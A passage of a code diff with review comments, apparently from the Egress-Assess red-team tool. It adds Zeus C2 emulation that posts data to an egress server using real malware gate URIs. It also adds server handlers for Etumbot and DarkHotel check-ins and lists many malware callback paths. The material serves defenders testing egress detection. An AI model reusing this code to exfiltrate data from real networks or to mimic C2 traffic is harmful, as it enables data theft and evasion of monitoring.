'/wqwcqqw/sasasacw.php', '/images/server/file.php',
|
||||
'/images/server/gate.php', '/cache/lcitorg/config.bin',
|
||||
'/cache/lcitorg/gate.php', '/form/panel/config.jpg',
|
||||
'/form/panel/gate.php', '/backup/gate.php',
|
||||
'/backup/jera.jpg', '/images/file.php',
|
||||
'/images/js/panel/config.jpg', '/images/js/panel/gate.php',
|
||||
'/images/config.jpg', '/images/gate.php',
|
||||
'/slim-cita/helps/file.php', '/slim-cita/helps/gate.php',
|
||||
'/kin/panelz/config.jpg', '/kin/panelz/gate.php',
|
||||
'/image/Panel/config.jpg', '/folder/config.bin',
|
||||
'/folder/secure.php', '/plugins/panel/config.jpg',
|
||||
'/plugins/panel/gate.php',
|
||||
'/wp-content/plugins/slxcdfrdmn9r0x/j7.php', '/q/gate.php',
|
||||
'/q/outl.jpg', '/media/k2/file.php', '/media/k2/gate.php',
|
||||
'/js/MOM/config.jpg', '/js/MOM/gate.php',
|
||||
'/lung/panel/config.jpg', '/wp/config.jpg',
|
||||
'/wp/gate.php', '/data/config.jpg', '/data/gate.php',
|
||||
'/templates/beez/bot.exe', '/templates/beez/config.bin',
|
||||
'/templates/beez/gate.php', '/wp-includes/css/new/config.jpg',
|
||||
'/wp-includes/css/new/gate.php',
|
||||
'/language/pdf_fonts/server/bot.exe',
|
||||
'/language/pdf_fonts/server/config.bin',
|
||||
'/language/pdf_fonts/server/gate.php', '/js/liscence.php',
|
||||
'/js/userslogin.php', '/ijo/config.jpg', '/ijo/gate.php',
|
||||
'/Mix/valeg/bot.exe', '/Mix/valeg/config.bin',
|
||||
'/Mix/valeg/gate.php', '/media/media/js/.js/ajax.php',
|
||||
'/media/media/js/.js/color.jpg', '/wpc/Panel/config.jpg',
|
||||
'/wpc/Panel/gate.php', '/images/gate.php', '/images/stab.jpg',
|
||||
'/wpadm/Panel/config.jpg', '/wpadm/Panel/gate.php',
|
||||
'/admin/b7.php', '/admin/file.php', '/amed/config.jpg',
|
||||
'/amed/gate.php', '/sadcxvbv/vdfbffddf.php',
|
||||
'/wpimages/image.php', '/ger/config.jpg', '/ger/gate.php',
|
||||
'/percy/panel/config.jpg', '/percy/panel/gate.php',
|
||||
'/map/Icons/outglav.exe', '/map/Icons/Religion/brah.png',
|
||||
'/map/Icons/Religion/exejfjfjexe.exe', '/images/config.jpg',
|
||||
'/images/gate.php', '/file.php', '/gate.php', '/.css/config.jpg',
|
||||
'/.css/gate.php', '/colobus/gate.php', '/colobus/vsam.jpg',
|
||||
'/news/secure.php', '/news/vuan.bin', '/.id/file.php',
|
||||
'/.id/gate.php',
|
||||
'/fast-move/cidphp/file.php', '/fast-move/cidphp/gate.php',
|
||||
'/overopen/panel/config.bin', '/overopen/panel/secure.php',
|
||||
'/chromez/config.jpg', '/chromez/gate.php', '/libraries/db.php',
|
||||
'/sadcxvbv/vdfbffddf.php', '/wqwcqqw/sasasacw.php',
|
||||
'/wp-comment/baba.jpg', '/wp-comment/gate.php',
|
||||
'/alumno309/images/base.bin', '/alumno309/images/base.exe',
|
||||
'/alumno309/images/secure.php',
|
||||
'/wp-content/plugins/wp-db-backup-made/das.db',
|
||||
'/ta_images/tools.php', '/plank/panel/config.jpg',
|
||||
'/includes/database/http/config.jpg',
|
||||
'/includes/database/http/zin.php', '/wqwcqqw/sasasacw.php',
|
||||
'/administrator/modules/mod_menu/help/config.jpg',
|
||||
'/administrator/modules/mod_menu/help/gate.php', '/old/jx36.bin',
|
||||
'/old/jx36.exe', '/old/secure.php', '/images/icons/bt.exe',
|
||||
'/images/icons/cfg.bin', '/images/icons/gate.php', '/t/wpg.php',
|
||||
'/forum.php', '/config.php', '/wp-blog/gate.php',
|
||||
'/wp-blog/mell.jpg', '/descargas/adm/gate.php',
|
||||
'/descargas/config/orqu.bin', '/wp-rss.php', '/images/gate.php',
|
||||
'/images/outl.jpg', '/images/smilies/raye.jpg',
|
||||
'/images/kin/config.jpg', '/jaextmanager_data/rimm.bin',
|
||||
'/jaextmanager_data/secure.php', '/js/cssme/file.php',
|
||||
'/js/cssme/thread.php', '/mss/plugins/system/config.bin',
|
||||
'/mss/plugins/system/gate.php', '/wp-admin/maint/config.bin',
|
||||
'/wp-admin/maint/gate.php', '/blog/wp-content/uploads/kim.dot',
|
||||
'/images/secure.php', '/images/todo.bin', '/images/todo.exe',
|
||||
'/plugins/system/bot.exe', '/plugins/system/config.bin',
|
||||
'/plugins/system/gate.php', '/modules/mod_footer/tmpl/file.php',
|
||||
'/modules/mod_footer/tmpl/gate.php', '/modules/secure.php',
|
||||
'/modules/warp.bin', '/modules/warp.exe', '/file.php',
|
||||
'/gate.php', '/db1/config.jpg', '/db1/gate.php',
|
||||
'/katolog/thumbs/panel/config.jpg',
|
||||
'/katolog/thumbs/panel/gate.php']
|
||||
|
||||
def emulate(self, data_to_exfil=None):
|
||||
|
||||
# headers that are used in get requests
|
||||
zeus_headers = {
|
||||
"Accept": "*/*",
|
||||
"Connection": "Close",
|
||||
"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
|
||||
"Pragma": "no-cache"
|
||||
}
|
||||
|
||||
# Iterate over get and post request 5 times
|
||||
for times_requested in xrange(1, 6):
|
||||
selected_domain = random.choice(self.domains)
|
||||
zeus_headers['Host'] = selected_domain
|
||||
first_uri = random.choice(self.uris)
|
||||
|
||||
get_request = urllib2.Request(
|
||||
"http://" + self.egress_server + first_uri,
|
||||
headers=zeus_headers)
|
||||
try:
|
||||
urllib2.urlopen(get_request)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to zeus data exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
sys.exit(1)
|
||||
|
||||
select_post_uri = False
|
||||
while not select_post_uri:
|
||||
post_uri = random.choice(self.uris)
|
||||
if post_uri.endswith('.exe'):
|
||||
pass
|
||||
else:
|
||||
select_post_uri = True
|
||||
|
||||
# Determining which data is being sent out by agent
|
||||
if data_to_exfil is None:
|
||||
posted_data = random.choice(self.post_data)
|
||||
else:
|
||||
posted_data = {'zeus_data': data_to_exfil}
|
||||
|
||||
# UrlEncode and send the data out
|
||||
posted_data = urllib.urlencode(posted_data)
|
||||
post_req = urllib2.Request(
|
||||
"http://" + self.egress_server + post_uri, posted_data,
|
||||
headers=zeus_headers)
|
||||
|
||||
try:
|
||||
urllib2.urlopen(post_req)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to putter zeus exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
sys.exit(1)
|
||||
|
||||
print "[*] INFO: Zeus C2 comms complete!"
|
||||
|
||||
return
|
|
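Review bot: The `self.domains` literal is missing a comma between `'mccc-investconsultant.com'` and `'muazymaur.tk'`, so implicit concatenation produces the single bogus entry `mccc-investconsultant.commuazymaur.tk` and drops both real names; fix is `'liveresellerweb.eu', 'mccc-investconsultant.com', 'muazymaur.tk',`. The POST error message reads `"[*] Error: Cannot connect to putter zeus exfil server!"`, a copy-paste from the putterpanda module; it should say `zeus data exfil server`. The `while not select_post_uri` loop can be written as `post_uri = random.choice([u for u in self.uris if not u.endswith('.exe')])`, which is bounded and documents the filter; a comment on why `.exe` targets are excluded from the POST (but `.bin` is not) would also help.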
@ -33,6 +33,14 @@ def cli_parser():
|
|||
protocols.add_argument("--ip", metavar="192.168.1.2", default=None,
|
||||
help="IP to extract data to.")
|
||||
|
||||
actors = parser.add_argument_group('Actor Emulation')
|
||||
actors.add_argument(
|
||||
"--actor", default=None, metavar="[zeus]",
|
||||
help="Emulate [actor] C2 comms to egress server.")
|
||||
actors.add_argument(
|
||||
"--list-actors", default=False, action='store_true',
|
||||
help="List all supported malware/APT group modules")
|
||||
|
||||
servers = parser.add_argument_group('Server Protocol Options')
|
||||
servers.add_argument(
|
||||
"--server", default=None, metavar='[http]',
|
||||
|
@ -74,19 +82,19 @@ def cli_parser():
|
|||
print "[*] Error: FTP or SFTP connections require \
|
||||
a username and password!".replace(' ', '')
|
||||
print "[*] Error: Please re-run and provide the required info!"
|
||||
sys.exit()
|
||||
sys.exit(1)
|
||||
|
||||
if args.client and args.ip is None:
|
||||
print "[*] Error: You said to act like a client, but provided no ip"
|
||||
print "[*] Error: to connect to. Please re-run with required info!"
|
||||
sys.exit()
|
||||
sys.exit(1)
|
||||
|
||||
if (args.client is not None) and (args.datatype is None) and (
|
||||
args.file is None):
|
||||
print "[*] Error: You need to tell Egress-Assess the type \
|
||||
of data to send!".replace(' ', '')
|
||||
print "[*] Error: to connect to. Please re-run with required info!"
|
||||
sys.exit()
|
||||
sys.exit(1)
|
||||
|
||||
if (args.client is None and args.server is None and
|
||||
args.list_servers is None and args.list_clients is None and
|
||||
|
@ -95,7 +103,12 @@ def cli_parser():
|
|||
a server or client!".replace(' ', '')
|
||||
print "[*] Error: Please re-run and provide an action to perform!"
|
||||
parser.print_help()
|
||||
sys.exit()
|
||||
sys.exit(1)
|
||||
|
||||
if args.actor is not None and args.ip is None:
|
||||
print "[*] Error: You did not provide an IP to egress data to!"
|
||||
print "[*] Error: Please re-run and provide an ip!"
|
||||
sys.exit(1)
|
||||
|
||||
return args
|
||||
|
||||
|
|
|
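Review bot: The new `--actor`/`--ip` guard does not reject `--actor` combined with `--server` or `--client`, yet the main script checks `if cli_parsed.server is not None:` before `elif cli_parsed.actor is not None:`, so `--actor zeus --server http` silently runs the server branch and never emulates the actor. Add alongside the new check: `if args.actor is not None and (args.server is not None or args.client is not None):` / `print "[*] Error: --actor cannot be combined with --server or --client!"` / `sys.exit(1)`. The `--actor` help text could also say the name is matched case-insensitively against the module `cli` values listed by `--list-actors`, since the parser itself does not validate it. `cli_parser` starts before the first hunk.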
@ -6,6 +6,8 @@ This is the conductor which controls everything
|
|||
|
||||
import glob
|
||||
import imp
|
||||
from commandcontrol.malware import *
|
||||
from commandcontrol.apt import *
|
||||
from protocols.servers import *
|
||||
from protocols.clients import *
|
||||
from datatypes import *
|
||||
|
@ -19,6 +21,7 @@ class Conductor:
|
|||
self.client_protocols = {}
|
||||
self.server_protocols = {}
|
||||
self.datatypes = {}
|
||||
self.actor_modules = {}
|
||||
|
||||
def load_client_protocols(self, command_line_object):
|
||||
for name in glob.glob('protocols/clients/*.py'):
|
||||
|
@ -27,7 +30,6 @@ class Conductor:
|
|||
self.client_protocols[name] = loaded_client_proto.Client(command_line_object)
|
||||
return
|
||||
|
||||
|
||||
def load_server_protocols(self, command_line_object):
|
||||
for name in glob.glob('protocols/servers/*.py'):
|
||||
if name.endswith(".py") and ("__init__" not in name):
|
||||
|
@ -41,3 +43,14 @@ class Conductor:
|
|||
loaded_datatypes = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
|
||||
self.datatypes[name] = loaded_datatypes.Datatype(command_line_object)
|
||||
return
|
||||
|
||||
def load_actors(self, command_line_object):
|
||||
for name in glob.glob('commandcontrol/malware/*.py'):
|
||||
if name.endswith(".py") and ("__init__" not in name):
|
||||
loaded_actors = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
|
||||
self.actor_modules[name] = loaded_actors.Actor(command_line_object)
|
||||
for name in glob.glob('commandcontrol/apt/*.py'):
|
||||
if name.endswith(".py") and ("__init__" not in name):
|
||||
loaded_actors = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
|
||||
self.actor_modules[name] = loaded_actors.Actor(command_line_object)
|
||||
return
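Review bot: `name.replace("/", ".").rstrip('.py')` in load_actors strips a trailing *character set*, not the `.py` suffix, so an actor file whose base name ends in `p` or `y` is registered with `imp.load_source` under a truncated module name and two such files can collide. Since the preceding `endswith(".py")` guard already guarantees the suffix, `name[:-3].replace("/", ".")` is the exact replacement for both loops; the same expression in load_datatypes is pre-existing context and would benefit from the identical fix. A short docstring on load_actors stating that it instantiates `Actor(command_line_object)` for every module under both directories and keys `actor_modules` by file path would also help, since callers iterate that dict to match `cli` names.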
|
||||
|
|
|
@ -4,7 +4,6 @@ This is the web client code
|
|||
|
||||
'''
|
||||
|
||||
import ssl
|
||||
import sys
|
||||
import urllib2
|
||||
|
||||
|
@ -24,15 +23,6 @@ class Client:
|
|||
self.file_transfer = cli_object.file
|
||||
|
||||
def transmit(self, data_to_transmit):
|
||||
# This restores the same behavior as before.
|
||||
try:
|
||||
_create_unverified_https_context = ssl._create_unverified_context
|
||||
except AttributeError:
|
||||
# Legacy Python that doesn't verify HTTPS certificates by default
|
||||
pass
|
||||
else:
|
||||
# Handle target environment that doesn't support HTTPS verification
|
||||
ssl._create_default_https_context = _create_unverified_https_context
|
||||
if not self.file_transfer:
|
||||
url = "https://" + self.remote_server + "/post_data.php"
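Review bot: With the `ssl._create_default_https_context` override removed from transmit, HTTPS certificate verification now follows the interpreter default, which on 2.7.9+ means a post to an Egress-Assess server using a self-signed certificate will fail unless an exemption is applied elsewhere in this class (not visible in the hunk). That is the right direction from a defender's view — the old form was a process-wide monkeypatch of a private ssl attribute — but transmit should document it, e.g. `# Certificate verification is left at the interpreter default; pass an explicit context to the urlopen call if a test server needs an exemption scoped to this client.` If `import ssl` is the line dropped in the first hunk, confirm nothing else in the file still references `ssl`. transmit's body continues outside the hunk.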
|
||||
|
||||
|
|
|
@ -1,7 +1,11 @@
|
|||
import os
|
||||
import random
|
||||
import time
|
||||
from BaseHTTPServer import BaseHTTPRequestHandler
|
||||
from common import helpers
|
||||
from commandcontrol.apt import *
|
||||
from commandcontrol.malware import *
|
||||
from protocols.servers.serverlibs.web import malware_callbacks
|
||||
|
||||
|
||||
class GetHandler(BaseHTTPRequestHandler):
|
||||
|
@ -11,7 +15,59 @@ class GetHandler(BaseHTTPRequestHandler):
|
|||
# should be performing GET requests Help from
|
||||
# http://pymotw.com/2/BaseHTTPServer/
|
||||
def do_GET(self):
|
||||
if self.path in malware_callbacks.malware_uris:
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
|
||||
elif self.path == malware_callbacks.etumbot_checkin:
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write(malware_callbacks.etumbot_checkin_response)
|
||||
|
||||
elif ((self.path.startswith(malware_callbacks.etumbot_uri) or self.path.startswith(malware_callbacks.etumbot_uri2)) and (self.path.endswith(malware_callbacks.etumbot_extensions) or self.path.endswith(malware_callbacks.etumbot_extensions2)) or self.path.startswith(malware_callbacks.etumbot_uri3) or self.path.startswith(malware_callbacks.etumbot_uri4) or self.path.startswith(malware_callbacks.etumbot_uri5)):
|
||||
# current directory
|
||||
exfil_directory = os.path.join(helpers.ea_path(), "data")
|
||||
loot_path = exfil_directory + "/"
|
||||
if not os.path.isdir(loot_path):
|
||||
os.makedirs(loot_path)
|
||||
# Get the date info
|
||||
current_date = time.strftime("%m/%d/%Y")
|
||||
current_time = time.strftime("%H:%M:%S")
|
||||
screenshot_name = current_date.replace("/", "") +\
|
||||
"_" + current_time.replace(":", "") + "actor_data.txt"
|
||||
with open(loot_path + screenshot_name, 'a') as cc_data_file:
|
||||
cc_data_file.write('etumbot just checked in here!\n')
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write(random.choice(malware_callbacks.encoded_response))
|
||||
|
||||
elif self.path == malware_callbacks.darkhotel_checkin:
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write('DEXT8726.168.15.192')
|
||||
|
||||
elif self.path == malware_callbacks.darkhotel_checkin2:
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write('DEXT87no')
|
||||
|
||||
elif self.path.startswith(malware_callbacks.darkhotel_uri):
|
||||
exfil_directory = os.path.join(helpers.ea_path(), "data")
|
||||
loot_path = exfil_directory + "/"
|
||||
if not os.path.isdir(loot_path):
|
||||
os.makedirs(loot_path)
|
||||
# Get the date info
|
||||
current_date = time.strftime("%m/%d/%Y")
|
||||
current_time = time.strftime("%H:%M:%S")
|
||||
screenshot_name = current_date.replace("/", "") +\
|
||||
"_" + current_time.replace(":", "") + "actor_data.txt"
|
||||
with open(loot_path + screenshot_name, 'a') as cc_data_file:
|
||||
cc_data_file.write('DarkHotel just checked in here!\n')
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write('DKCheckin good')
|
||||
|
||||
else:
|
||||
# 404 since we aren't serving up any pages, only receiving data
|
||||
self.send_response(404)
|
||||
self.end_headers()
|
||||
|
@ -20,11 +76,6 @@ class GetHandler(BaseHTTPRequestHandler):
|
|||
# handle post request
|
||||
def do_POST(self):
|
||||
|
||||
# Gather the Posted URI from the agent/browser
|
||||
# parsed_path = urlparse.urlparse(self.path)
|
||||
uri_posted = self.path
|
||||
uri_posted = uri_posted.replace("/", "")
|
||||
#incoming_ip = self.client_address[0]
|
||||
# current directory
|
||||
exfil_directory = os.path.join(helpers.ea_path(), "data")
|
||||
loot_path = exfil_directory + "/"
|
||||
|
@ -32,7 +83,7 @@ class GetHandler(BaseHTTPRequestHandler):
|
|||
# Info for this from -
|
||||
# http://stackoverflow.com/questions/13146064/simple-
|
||||
# python-webserver-to-save-file
|
||||
if uri_posted == "post_data.php":
|
||||
if self.path == "/post_data.php":
|
||||
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
|
@ -56,7 +107,7 @@ class GetHandler(BaseHTTPRequestHandler):
|
|||
with open(loot_path + screenshot_name, 'a') as cc_data_file:
|
||||
cc_data_file.write(screen_data)
|
||||
|
||||
elif uri_posted == "post_file.php":
|
||||
elif self.path == "/post_file.php":
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
|
||||
|
@ -75,7 +126,7 @@ class GetHandler(BaseHTTPRequestHandler):
|
|||
with open(loot_path + file_name, 'wb') as cc_data_file:
|
||||
cc_data_file.write(file_data)
|
||||
|
||||
elif uri_posted == "posh_file.php":
|
||||
elif self.path == "/posh_file.php":
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
|
||||
|
@ -91,6 +142,30 @@ class GetHandler(BaseHTTPRequestHandler):
|
|||
with open(loot_path + filename, 'wb') as cc_data_file:
|
||||
cc_data_file.write(data)
|
||||
|
||||
elif (self.path in malware_callbacks.malware_uris) or (self.path.startswith(other_uri) for other_uri in malware_callbacks.other_apt_uris):
|
||||
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
|
||||
# Check to make sure the agent directory exists, and a loot
|
||||
# directory for the agent. If not, make them
|
||||
if not os.path.isdir(loot_path):
|
||||
os.makedirs(loot_path)
|
||||
|
||||
# Get the date info
|
||||
current_date = time.strftime("%m/%d/%Y")
|
||||
current_time = time.strftime("%H:%M:%S")
|
||||
screenshot_name = current_date.replace("/", "") +\
|
||||
"_" + current_time.replace(":", "") + "actor_data.txt"
|
||||
|
||||
# Read the length of the screenshot file being uploaded
|
||||
screen_length = self.headers['content-length']
|
||||
screen_data = self.rfile.read(int(screen_length))
|
||||
|
||||
# Write out the file
|
||||
with open(loot_path + screenshot_name, 'a') as cc_data_file:
|
||||
cc_data_file.write(screen_data)
|
||||
|
||||
# All other Post requests
|
||||
else:
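Review bot: The new `elif` near the end of do_POST, `(self.path in malware_callbacks.malware_uris) or (self.path.startswith(other_uri) for other_uri in malware_callbacks.other_apt_uris)`, uses a bare generator expression as the second operand; a generator object is always truthy, so every POST that reaches this branch is answered 200 and written to the loot file, and the trailing `else` 404 branch is unreachable. Wrap it in `any(...)`: `elif (self.path in malware_callbacks.malware_uris) or any(self.path.startswith(other_uri) for other_uri in malware_callbacks.other_apt_uris):`. In that same branch `int(self.headers['content-length'])` raises KeyError or ValueError on a missing or non-numeric header, which surfaces as a handler traceback rather than a 400 response. The etumbot and darkhotel branches of do_GET repeat the loot-directory/timestamp setup that do_POST already carries; a small helper would remove the triplication. do_POST's body continues past the hunk.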
|
||||
|
||||
|
|
|
@ -0,0 +1,208 @@
|
|||
'''
|
||||
|
||||
This file is for managing malware/APT callbacks
|
||||
|
||||
'''
|
||||
|
||||
malware_uris = [
|
||||
'/jm32/includes/site/bot.exe', '/jm32/includes/site/config.bin',
|
||||
'/jm32/includes/site/gate.php', '/mathew/config.jpg',
|
||||
'/docs/.docs/config.jpg', '/docs/.docs/do.php',
|
||||
'/zeujuus/a/gate.php', '/zeujuus/a/modules/bot.exe',
|
||||
'/zeujuus/a/modules/config.bin',
|
||||
'/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php',
|
||||
'/zejius/2HZG41Zw/bot.exe',
|
||||
'/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin',
|
||||
'/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php',
|
||||
'/zejius/5GPR0iy9/bot.exe',
|
||||
'/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin', '/past/config.jpg',
|
||||
'/past/gate.php', '/fan/base/config.jpg',
|
||||
'/wp-includes/pomo/panel/config.jpg',
|
||||
'/wp-includes/pomo/panel/gate.php', '/themes/panel/config.jpg',
|
||||
'/themes/panel/gate.php', '/home/libraries/joomla/php/gate.php',
|
||||
'/home/plugins/system/tmp/bot.scr',
|
||||
'/home/plugins/system/tmp/config.bin',
|
||||
'/home/plugins/system/tmp/gate.php', '/js/ssj/config.jpg',
|
||||
'/js/ssj/gate.php', '/site/tmp/xml/config.jpg',
|
||||
'/site/tmp/xml/gate.php', '/news/wpg.php', '/file.php',
|
||||
'/.cgi-bin./as.bin', '/wp-content/themes/bmw_lab/new.ban',
|
||||
'/wp-content/themes/bmw_lab/newnew.wav', '/vs/panel/config.jpg',
|
||||
'/vs/panel/gate.php', '/brand/server/file.php',
|
||||
'/brand/server/gate.php',
|
||||
'/wp-admin/css/colors/sunrise/admin/bot.exe',
|
||||
'/wp-admin/css/colors/sunrise/admin/config.bin',
|
||||
'/wp-admin/css/colors/sunrise/admin/secure.php',
|
||||
'/wp-content/themes/chagim/library/images/plates/bot.exe',
|
||||
'/wp-content/themes/chagim/library/images/plates/config.bin',
|
||||
'/wp-content/themes/chagim/library/images/plates/gate.php',
|
||||
'/images/burr_insurance001001.php', '/images/team/config.jpg',
|
||||
'/images/team/gate.php', '/test/config.jpg', '/test/gate.php',
|
||||
'/ray/server/file.php', '/ray/server/gate.php', '/capa.bin',
|
||||
'/capa.exe', '/secure.php', '/ral/30/config.bin',
|
||||
'/ral/30/secure.php', '/wp-admin/css/config.bin',
|
||||
'/wp-admin/css/gate.php', '/wp-admin/css/setup.exe',
|
||||
'/panel/config.jpg', '/panel/gate.php',
|
||||
'/wp-includes2/SimplePie/Net/page/config.jpg',
|
||||
'/wp-includes2/SimplePie/Net/page/gate.php',
|
||||
'/includes/.srv/srv/bot.exe',
|
||||
'/includes/.srv/srv/config.bin', '/includes/.srv/srv/gate.php',
|
||||
'/ric/30/config.bin', '/ric/30/secure.php', '/blog/crea.bin',
|
||||
'/blog/crea.exe', '/blog/secure.php', '/images2/dave.jpg',
|
||||
'/images2/gate.php', '/wp-includes/ID3/config.jpg',
|
||||
'/wp-includes/ID3/gate.php', '/emman/panel/config.jpg',
|
||||
'/emman/panel/gate.php', '/xampp/img/escu.bin',
|
||||
'/xampp/img/escu.exe', '/xampp/img/secure.php',
|
||||
'/.css/config.jpg', '/.css/gate.php', '/admin/cfg.bin',
|
||||
'/admin/gate.php', '/isai/modules/mod_upgrade/bot.exe',
|
||||
'/isai/modules/mod_upgrade/config.bin',
|
||||
'/isai/modules/mod_upgrade/gate.php', '/wp-comment/firs.jpg',
|
||||
'/wp-comment/gate.php', '/panel/file.php', '/panel/gate.php',
|
||||
'/images01/fong.bin', '/images01/fong.exe', '/images01/gate.php',
|
||||
'/img/vg.php', '/components/com_file/file.php',
|
||||
'/components/com_file/gate.php', '/images/panel/config.jpg',
|
||||
'/images/panel/gate.php', '/wordpress/gate.php',
|
||||
'/wordpress/gree.jpg', '/media/.tmp/file.php',
|
||||
'/media/.tmp/gate.php', '/gate.php', '/modules/holl.bin',
|
||||
'/modules/holl.exe', '/templates/admin/install/config.jpg',
|
||||
'/templates/admin/install/gate.php',
|
||||
'/tmp/admin/install/config.jpg', '/tmp/admin/install/gate.php',
|
||||
'/tmp/cp/config.jpg', '/tmp/cp/gate.php',
|
||||
'/tmp/install/config.jpg', '/tmp/install/gate.php',
|
||||
'/frank/panel/config.jpg', '/frank/panel/gate.php',
|
||||
'/tmp/configs/new/vg.php', '/meask/lite/file.php',
|
||||
'/meask/lite/gate.php', '/css/src/admin/config.jpg',
|
||||
'/css/src/admin/gate.php', '/js/admin/install/config.jpg',
|
||||
'/js/admin/install/gate.php',
|
||||
'/wp-content/plugins/wp-db-backup-made/work.php',
|
||||
'/update/bot.exe', '/update/cfg.bin', '/update/gate.php',
|
||||
'/chopinschumann/ital.bin', '/chopinschumann/ital.exe',
|
||||
'/chopinschumann/secure.php', '/images/ital.bin',
|
||||
'/images/ital.exe', '/images/secure.php',
|
||||
'/compose/panel/bot.exe', '/compose/panel/config.bin',
|
||||
'/compose/panel/secure.php', '/fy97/panel/config.bin',
|
||||
'/fy97/panel/secure.php', '/images/joea.bin', '/images/joea.exe',
|
||||
'/images/secure.php', '/components/com_joomla/plugin/config.jpg',
|
||||
'/components/com_joomla/plugin/gate.php',
|
||||
'/resource/css/config.bin', '/resource/css/secure.php',
|
||||
'/wp-content/upgrade/PANEL/config.jpg',
|
||||
'/wp-content/upgrade/PANEL/gate.php',
|
||||
'/wp-content/plugins/bcet56aoikqf52iu/food.php',
|
||||
'/Scripts/_notes/build/bot.exe',
|
||||
'/Scripts/_notes/build/config.bin',
|
||||
'/Scripts/_notes/build/gate.php', '/REMOVED/.pop/bot.exe',
|
||||
'/REMOVED/.pop/config.bin', '/REMOVED/.pop/gate.php',
|
||||
'/KINS/panel/bot.exe', '/KINS/panel/config.jpg',
|
||||
'/KINS/panel/gate.php', '/panel/config.jpg', '/panel/gate.php',
|
||||
'/walex/files/bot.exe', '/walex/files/config.jpg',
|
||||
'/walex/files/gate.php', '/e7/bot.exe', '/e7/cfg.bin',
|
||||
'/e7/gate.php',
|
||||
'/wp-admin/css/colors/coffee/cat/server/config.jpg',
|
||||
'/wp-admin/css/colors/coffee/cat/server/gate.php',
|
||||
'/site/S/13897652/5112/file.php',
|
||||
'/site/S/13897652/5112/gate.php',
|
||||
'/images/js/osomo/panel/config.jpg',
|
||||
'/images/js/osomo/panel/gate.php',
|
||||
'/themes/panel/config.jp', '/themes/panel/gate.php',
|
||||
'/system/eusat/telesa/config.jpg', '/sadcxvbv/vdfbffddf.php',
|
||||
'/wqwcqqw/sasasacw.php', '/images/server/file.php',
|
||||
'/images/server/gate.php', '/cache/lcitorg/config.bin',
|
||||
'/cache/lcitorg/gate.php', '/form/panel/config.jpg',
|
||||
'/form/panel/gate.php', '/backup/gate.php',
|
||||
'/backup/jera.jpg', '/images/file.php',
|
||||
'/images/js/panel/config.jpg', '/images/js/panel/gate.php',
|
||||
'/images/config.jpg', '/images/gate.php',
|
||||
'/slim-cita/helps/file.php', '/slim-cita/helps/gate.php',
|
||||
'/kin/panelz/config.jpg', '/kin/panelz/gate.php',
|
||||
'/image/Panel/config.jpg', '/folder/config.bin',
|
||||
'/folder/secure.php', '/plugins/panel/config.jpg',
|
||||
'/plugins/panel/gate.php',
|
||||
'/wp-content/plugins/slxcdfrdmn9r0x/j7.php', '/q/gate.php',
|
||||
'/q/outl.jpg', '/media/k2/file.php', '/media/k2/gate.php',
|
||||
'/js/MOM/config.jpg', '/js/MOM/gate.php',
|
||||
'/lung/panel/config.jpg', '/wp/config.jpg',
|
||||
'/wp/gate.php', '/data/config.jpg', '/data/gate.php',
|
||||
'/templates/beez/bot.exe', '/templates/beez/config.bin',
|
||||
'/templates/beez/gate.php', '/wp-includes/css/new/config.jpg',
|
||||
'/wp-includes/css/new/gate.php',
|
||||
'/language/pdf_fonts/server/bot.exe',
|
||||
'/language/pdf_fonts/server/config.bin',
|
||||
'/language/pdf_fonts/server/gate.php', '/js/liscence.php',
|
||||
'/js/userslogin.php', '/ijo/config.jpg', '/ijo/gate.php',
|
||||
'/Mix/valeg/bot.exe', '/Mix/valeg/config.bin',
|
||||
'/Mix/valeg/gate.php', '/media/media/js/.js/ajax.php',
|
||||
'/media/media/js/.js/color.jpg', '/wpc/Panel/config.jpg',
|
||||
'/wpc/Panel/gate.php', '/images/gate.php', '/images/stab.jpg',
|
||||
'/wpadm/Panel/config.jpg', '/wpadm/Panel/gate.php',
|
||||
'/admin/b7.php', '/admin/file.php', '/amed/config.jpg',
|
||||
'/amed/gate.php', '/sadcxvbv/vdfbffddf.php',
|
||||
'/wpimages/image.php', '/ger/config.jpg', '/ger/gate.php',
|
||||
'/percy/panel/config.jpg', '/percy/panel/gate.php',
|
||||
'/map/Icons/outglav.exe', '/map/Icons/Religion/brah.png',
|
||||
'/map/Icons/Religion/exejfjfjexe.exe', '/images/config.jpg',
|
||||
'/images/gate.php', '/file.php', '/gate.php', '/.css/config.jpg',
|
||||
'/.css/gate.php', '/colobus/gate.php', '/colobus/vsam.jpg',
|
||||
'/news/secure.php', '/news/vuan.bin', '/.id/file.php',
|
||||
'/.id/gate.php',
|
||||
'/fast-move/cidphp/file.php', '/fast-move/cidphp/gate.php',
|
||||
'/overopen/panel/config.bin', '/overopen/panel/secure.php',
|
||||
'/chromez/config.jpg', '/chromez/gate.php', '/libraries/db.php',
|
||||
'/sadcxvbv/vdfbffddf.php', '/wqwcqqw/sasasacw.php',
|
||||
'/wp-comment/baba.jpg', '/wp-comment/gate.php',
|
||||
'/alumno309/images/base.bin', '/alumno309/images/base.exe',
|
||||
'/alumno309/images/secure.php',
|
||||
'/wp-content/plugins/wp-db-backup-made/das.db',
|
||||
'/ta_images/tools.php', '/plank/panel/config.jpg',
|
||||
'/includes/database/http/config.jpg',
|
||||
